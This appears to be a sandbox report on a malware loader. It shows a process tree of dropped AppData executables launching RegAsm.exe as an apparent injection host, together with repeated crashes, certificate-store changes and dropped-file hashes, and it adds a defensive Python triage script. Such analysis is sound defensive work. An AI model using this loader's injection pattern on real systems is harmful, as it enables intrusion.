C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --from-installer4⤵
- Checks computer location settings
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exeC:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Chromnius\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Chromnius\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Chromnius --annotation=ver=109.0.5386.0 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbdd04de28,0x7ffbdd04de38,0x7ffbdd04de485⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=gpu-process --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:25⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2336 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --start-stack-profiler --mojo-platform-channel-handle=2300 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --first-renderer-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3756 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --extension-process --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2292 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4132 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=4532 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5164 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=renderer --extension-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=5024 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5308 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
-
C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe"C:\Users\Admin\AppData\Local\Chromnius\Application\chromnius.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1860,i,1300675587824398893,14025156114465433509,131072 /prefetch:85⤵
- Modifies system certificate store
-
C:\Users\Admin\Downloads\LoaderAVX.exe"C:\Users\Admin\Downloads\LoaderAVX.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\FILE-WATCHER.SLN2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5008 -ip 50081⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6072 -ip 60721⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1784 -ip 17841⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f4 0x4c01⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6540 -ip 65401⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1372 -ip 13721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4332 -ip 43321⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵
-
(The bracketed number is the nesting depth in the report's process tree: a [2] entry is a child of the nearest preceding [1] entry.)
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 540 -ip 540
- [1] C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
  Command line: C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\JDSDS4.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSDS4.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\JDSG3.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSG3.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5948 -ip 5948
- [1] C:\Windows\system32\wbem\wmiprvse.exe
  Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- [1] C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
- [2] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 416
  Program crash
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5336 -ip 5336
- [1] C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
- [2] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 416
  Program crash
- [1] C:\Users\Admin\AppData\Roaming\JDSG3.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSG3.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
  Command line: C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\JDSDS4.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSDS4.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4392 -ip 4392
- [1] C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
- [2] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 316 -s 416
  Program crash
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 316 -ip 316
- [1] C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
- [2] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 416
  Program crash
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6224 -ip 6224
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2352 -ip 2352
- [1] C:\Users\Admin\AppData\Roaming\JDSG3.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSG3.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\JDSDS4.exe
  Command line: C:\Users\Admin\AppData\Roaming\JDSDS4.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
  Command line: C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe
- [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
- [1] C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
- [2] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 416
  Program crash
- [1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2888 -ip 2888
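The tree above repeats one shape many times: an executable dropped under C:\Users\Admin\AppData\Roaming\ (BVNMXCGHJ7.exe, JDSDS4.exe, JDSG3.exe) starts C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe with no arguments, and gntuud.exe under AppData\Local\Temp crashes again and again, each crash producing a WerFault.exe -u -p <pid> child plus a separate -pss reporting process. The following is an added example, editor's code rather than anything from the sandbox report. It parses the tree in the fused form this page shows (image path, command line and depth run together, terminated by ⤵) and applies two triage heuristics: a bare RegAsm.exe launched by a parent under \AppData\ is a generic sign of a .NET loader using a signed Microsoft binary as an injection host (a heuristic, not an attribution of these samples), and a WerFault.exe -u -p child counts as one crash of its parent. The sample lines are copied from the first entries of the fragment above; the first of them is a depth-2 child whose parent lies outside the fragment, so the parser has to tolerate an orphan. Assumptions: the depth is a single digit (true here) and every image path starts with C:\.

```python
"""Triage helpers for a sandbox process tree in the fused form extracted above."""
import re
from collections import Counter
from pathlib import PureWindowsPath

# Sample input copied from the first entries of the process tree above. The
# extraction ran image path, command line and nesting depth together on one
# line (<image><cmdline><depth>⤵). The first line is a depth-2 child whose
# parent lies before this fragment, so it must be tolerated as an orphan.
REPORT_LINES = [
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵',
    r'C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 540 -ip 5401⤵',
    r'C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exeC:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe1⤵',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵',
    r'C:\Users\Admin\AppData\Roaming\JDSDS4.exeC:\Users\Admin\AppData\Roaming\JDSDS4.exe1⤵',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵',
    r'C:\Users\Admin\AppData\Roaming\JDSG3.exeC:\Users\Admin\AppData\Roaming\JDSG3.exe1⤵',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵',
    r'C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5948 -ip 59481⤵',
    r'C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵',
    r'C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵',
    r'C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 4162⤵',
    r'C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5336 -ip 53361⤵',
    r'C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeC:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe1⤵',
    r'C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 4162⤵',
]


def parse_entry(line):
    """Split one fused line into (depth, image path, command line)."""
    body = line.strip().rstrip("⤵")
    depth = int(body[-1])  # assumption: depth is a single digit (1 or 2 on this page)
    body = body[:-1]
    # The command line restates the image path, optionally quoted, so the second
    # drive prefix marks where the command line starts.
    split = body.find('"C:\\', 1)
    if split == -1:
        split = body.find("C:\\", 1)
    if split == -1:
        raise ValueError(f"cannot separate image from command line: {line!r}")
    return depth, body[:split], body[split:]


def build_tree(lines):
    """Attach every entry to the nearest preceding entry one level shallower."""
    entries, last_at_depth = [], {}
    for line in lines:
        if not line.lstrip().startswith("C:\\"):
            continue  # annotation lines such as "Program crash" carry no process
        depth, image, cmdline = parse_entry(line)
        entries.append({"depth": depth, "image": image, "cmdline": cmdline,
                        "parent": last_at_depth.get(depth - 1)})
        # a new entry closes every deeper branch that came before it
        last_at_depth = {d: i for d, i in last_at_depth.items() if d < depth}
        last_at_depth[depth] = len(entries) - 1
    return entries


def is_bare_launch(image, cmdline):
    """True when the command line is nothing but the image path."""
    return cmdline.strip().strip('"').lower() == image.lower()


CRASH_HANDLER = re.compile(r"\s-u\s+-p\s+\d+")  # WerFault.exe -u -p <crashed pid> -s <event>


def analyze(lines):
    """Return injection-host candidates and crash counts keyed by parent image name."""
    entries = build_tree(lines)
    hosts, crashes = [], Counter()
    for e in entries:
        if e["parent"] is None:
            continue
        parent = entries[e["parent"]]
        parent_name = PureWindowsPath(parent["image"]).name
        child_name = PureWindowsPath(e["image"]).name.lower()
        # A bare RegAsm.exe started by a user-writable dropper is the usual shape of a
        # .NET loader hollowing a signed host: a heuristic, not proof of injection.
        if (child_name == "regasm.exe" and is_bare_launch(e["image"], e["cmdline"])
                and "\\appdata\\" in parent["image"].lower()):
            hosts.append((parent_name, e["image"]))
        # WerFault.exe -u -p <pid> is the crash handler for <pid>, i.e. for its parent here.
        if child_name == "werfault.exe" and CRASH_HANDLER.search(e["cmdline"]):
            crashes[parent_name] += 1
    return {"injection_hosts": hosts, "crashes": dict(crashes)}


if __name__ == "__main__":
    for key, value in analyze(REPORT_LINES).items():
        print(f"{key}: {value}")
```

Run as a script it prints three RegAsm.exe hosts and two gntuud.exe crashes for the excerpt; feeding it every process line of the report gives the full counts. The -pss WerFault.exe entries are deliberately not counted: they are the reporting side of the same crash and sit at depth 1, so counting them would double every event.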
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\ProgramData\mozglue.dll
  Filesize: 133KB
  MD5: 8f73c08a9660691143661bf7332c3c27
  SHA1: 37fa65dd737c50fda710fdbde89e51374d0c204a
  SHA256: 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
  SHA512: 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
- C:\ProgramData\nss3.dll
  Filesize: 1.2MB
  MD5: bfac4e3c5908856ba17d41edcd455a51
  SHA1: 8eec7e888767aa9e4cca8ff246eb2aacb9170428
  SHA256: e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
  SHA512: 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
  Filesize: 28KB
  MD5: 322ecbe70802f8b86a839114056dc625
  SHA1: 433e4e07f3107ea9fd944f26b3db165c5de949b4
  SHA256: 297d116e668d0b7f3217ef43e444f05df43c7adec55249b320df13230d436f1c
  SHA512: 97e1d104ece47b89fbc32ce2f026cce261d888cd9b6463d25bb0af8802757ed9ed3575bbd62a4b8c9017b8b7aa97e68428bb7a7ca45148b6963d26e3f1cd3d2c
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 53KB
